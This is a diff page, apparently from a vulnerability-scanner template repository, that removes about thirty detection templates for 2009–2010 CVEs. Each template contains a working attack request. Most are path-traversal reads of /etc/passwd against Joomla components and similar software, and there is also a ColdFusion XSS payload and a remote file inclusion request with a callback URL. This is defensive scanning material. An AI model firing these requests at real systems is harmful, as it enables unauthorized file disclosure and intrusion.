- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,32 +0,0 @@
id: CVE-2009-1872
info:
name: Adobe Coldfusion 8 linked XSS vulnerabilies
author: princechaddha
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference:
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
tags: cve,cve2009,adobe,xss,coldfusion
requests:
- method: GET
path:
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi,photo
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,26 +0,0 @@
id: CVE-2009-4223
info:
name: KR-Web <= 1.1b2 RFI
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
author: geeknik
severity: high
tags: cve,cve2009,krweb,rfi
requests:
- method: GET
path:
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"

View File

@ -1,27 +0,0 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi,nexus
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference:
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,32 +0,0 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.80
cve-id: CVE-2010-0467
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference:
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0944
info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-0985
info:
name: Joomla! Component com_abbrev - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10948
- https://www.cvedetails.com/cve/CVE-2010-0985
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,26 +0,0 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi,graph
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi,status
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1307
info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1308
info:
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12066
- https://www.cvedetails.com/cve/CVE-2010-1308
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1312
info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1313
info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -1,27 +0,0 @@
id: CVE-2010-1314
info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More